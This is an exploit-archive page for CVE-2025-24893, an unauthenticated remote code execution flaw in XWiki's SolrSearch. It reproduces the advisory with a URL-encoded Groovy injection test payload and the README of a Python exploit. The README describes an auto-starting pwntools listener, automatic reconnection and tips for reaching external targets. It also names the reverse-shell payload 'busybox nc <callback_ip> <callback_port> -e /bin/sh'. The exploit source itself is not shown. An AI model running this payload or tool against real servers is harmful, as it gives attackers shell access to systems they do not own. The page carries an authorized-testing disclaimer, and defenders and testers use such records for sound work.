Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/nopgadget/CVE-2025-24893
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Readme
# CVE-2025-24893 - XWiki Platform Remote Code Execution

A Python exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki Platform. This exploit includes a self-contained reverse shell listener using pwntools.

## Description

This exploit targets XWiki Platform installations vulnerable to CVE-2025-24893, allowing remote code execution through a template injection vulnerability in the SolrSearch component. The exploit automatically starts a reverse shell listener and provides an interactive shell upon successful exploitation.

## Requirements

- Python 3.x
- `requests` library
- `pwntools` library

## Installation

### Recommended: Using UV (Modern Python Package Manager)

```bash
# Install UV if you don't have it
curl -LsSf https://astral.sh/uv/install.sh | sh

# Install dependencies
uv pip install requests pwntools
```

### Alternative: Using pip

```bash
pip install requests pwntools
```

## Usage

### Basic Usage

```bash
python3 CVE-2025-24893.py <target_url>
```

### Examples

```bash
# Basic usage with default callback (0.0.0.0:9521)
python3 CVE-2025-24893.py example.com

# Custom callback IP and port
python3 CVE-2025-24893.py example.com -i 192.168.1.100 -p 4444

# Skip initial test and go straight to reverse shell
python3 CVE-2025-24893.py example.com --no-test

# Custom reconnection attempts
python3 CVE-2025-24893.py example.com --max-reconnects 10

# Full custom configuration
python3 CVE-2025-24893.py example.com -i 10.0.0.5 -p 8080 --no-test --max-reconnects 3
```

### Command Line Arguments

- `target`: Target URL (required)
  - Can be domain only: `example.com`
  - Can include protocol: `http://example.com` or `https://example.com`

- `-i, --ip`: Callback IP for reverse shell (default: 0.0.0.0)
  - Use `0.0.0.0` to listen on all interfaces
  - Use specific IP (e.g., `192.168.1.100`) to bind to specific interface

- `-p, --port`: Callback port for reverse shell (default: 9521)

- `--no-test`: Skip the initial test and go straight to reverse shell

- `--max-reconnects`: Maximum reconnection attempts when shell drops (default: 5)

## How It Works

1. **Protocol Detection**: Automatically detects if the target supports HTTP or HTTPS
2. **Test Phase**: Runs a test command (`id`) to verify the exploit works
3. **Listener Setup**: Automatically starts a reverse shell listener using pwntools
4. **Payload Execution**: Sends the reverse shell payload to the target
5. **Interactive Shell**: Provides an interactive shell upon successful connection
6. **Auto-Reconnection**: Automatically re-establishes connection if shell drops

## Self-Contained Reverse Shell

This exploit is self-contained and does not require manual netcat setup:

- Automatically starts a listener on the specified IP and port
- Handles the reverse shell connection automatically
- Provides an interactive shell interface
- No need to manually run `nc -lvp <port>`

## Automatic Reconnection

The exploit includes robust reconnection capabilities:

- **EOF Handling**: Automatically detects when shell connection drops
- **Auto-Recovery**: Re-establishes listener and re-sends exploit payload
- **Configurable Retries**: Set maximum reconnection attempts (default: 5)
- **Graceful Degradation**: Continues until max attempts reached

### Reconnection Behavior

When the shell connection drops (EOF error):
1. Detects the connection loss
2. Closes the old listener
3. Starts a new listener
4. Re-sends the exploit payload
5. Re-establishes the shell connection
6. Continues interactive session

## Payload Details

The exploit uses a Groovy template injection payload that executes:
```bash
busybox nc <callback_ip> <callback_port> -e /bin/sh
```

## Features

- **Automatic Protocol Detection**: Detects HTTP/HTTPS automatically
- **Self-Contained Listener**: No manual netcat setup required
- **Interactive Shell**: Full interactive shell upon successful exploitation
- **Test Mode**: Optional test phase to verify exploit works
- **Flexible Configuration**: Customizable callback IP and port
- **Auto-Reconnection**: Handles connection drops automatically
- **Robust Error Handling**: Graceful handling of various error conditions

## Troubleshooting

### Common Issues

1. **"Address already in use"**: Change the port using `-p` flag
2. **"Permission denied"**: Try using a port > 1024 or run with sudo
3. **No connection received**: 
   - Verify the target is vulnerable
   - Check if the target can reach your callback IP
   - Ensure no firewall is blocking the connection
4. **"Got EOF while sending in interactive"**: 
   - The script will automatically handle this and re-establish connection
   - If persistent, check network stability or increase `--max-reconnects`

### Network Considerations

- The callback IP should be reachable from the target
- Use `0.0.0.0` to listen on all interfaces
- For external targets, ensure your IP is publicly accessible
- Unstable networks may require higher reconnection limits

## Disclaimer

This tool is for educational and authorized testing purposes only. Always ensure you have proper authorization before testing any systems.

## Credits

- **Author**: nopgadget
- **Based on**: Original script by Al Baradi Joy

## License

This project is for educational purposes only. Use responsibly and only on systems you own or have explicit permission to test.
File Snapshot

 [4.0K]  /data/pocs/4bc4f9df59accdc479e9c7fceb303aeaad7b5344
├── [9.0K]  CVE-2025-24893.py
└── [5.2K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →